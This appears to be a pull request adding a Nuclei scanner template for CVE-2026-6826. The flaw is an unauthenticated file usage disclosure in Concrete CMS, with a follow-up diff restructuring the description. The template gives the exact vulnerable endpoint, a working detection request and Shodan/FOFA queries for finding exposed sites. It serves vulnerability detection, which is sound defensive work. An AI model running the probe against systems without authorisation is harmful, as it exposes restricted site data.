### PR TITLE
Add CVE-2026-6826 template

### DIFF
--- a/http/cves/2026/CVE-2026-6826.yaml
+++ b/http/cves/2026/CVE-2026-6826.yaml
@@ -1,0 +1,50 @@
+id: CVE-2026-6826
+
+info:
+  name: Concrete CMS <9.5.1 - Unauthenticated File Usage Disclosure
+  author: str4k3r
+  severity: medium
+  description: |
+    Concrete CMS 9.5.0 and below is vulnerable to unauthenticated file usage
+    disclosure via a missing permission check in the file usage controller. An
+    unauthenticated visitor can request /ccm/system/dialogs/file/usage/{fID}
+    with any file ID and receive the usage dialog listing every page that
+    references that file - including page IDs, handles and full URLs, some of
+    which may otherwise be restricted by permissions. No CSRF token, session or
+    rate limit is enforced on the endpoint.
+  reference:
+    - https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
+    - https://www.concretecms.org/security
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-6826
+    - https://vulnerability.circl.lu/vuln/cve-2026-6826
+  classification:
+    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
+    cvss-score: 6.9
+    cve-id: CVE-2026-6826
+    cwe-id: CWE-862
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: http.component:"Concrete CMS"
+    fofa-query: app="Concrete-CMS"
+  tags: cve,cve2026,concretecms,concrete,disclosure,unauth,idor
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/ccm/system/dialogs/file/usage/1"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'ccm-ui'
+          - 'Page ID'
+          - 'Handle'
+          - 'Location'
+        condition: and
+
+      - type: status
+        status:
+          - 200

--- a/http/cves/2026/CVE-2026-6826.yaml
+++ b/http/cves/2026/CVE-2026-6826.yaml
@@ -5,13 +5,11 @@ info:
   author: str4k3r
   severity: medium
   description: |
-    Concrete CMS 9.5.0 and below is vulnerable to unauthenticated file usage
-    disclosure via a missing permission check in the file usage controller. An
-    unauthenticated visitor can request /ccm/system/dialogs/file/usage/{fID}
-    with any file ID and receive the usage dialog listing every page that
-    references that file - including page IDs, handles and full URLs, some of
-    which may otherwise be restricted by permissions. No CSRF token, session or
-    rate limit is enforced on the endpoint.
+    Concrete CMS 9.5.0 and below  is vulnerable to unauthenticated file usage disclosure via missing permission check in the usage controller.
+  impact: |
+    Any unauthenticated visitor can request /ccm/system/dialogs/file/usage/{fID} with any file ID and receive a list of every page that references that file, including page IDs, handles, and full URLs. This includes pages that are otherwise restricted by permissions.
+  remediation: |
+    Update to the latest version beyond 9.5.0.
   reference:
     - https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
     - https://www.concretecms.org/security


### PR DESCRIPTION
Adds the Nuclei template for **CVE-2026-6826** as an ecosystem contribution.
The template follows the repository format and references the public advisory.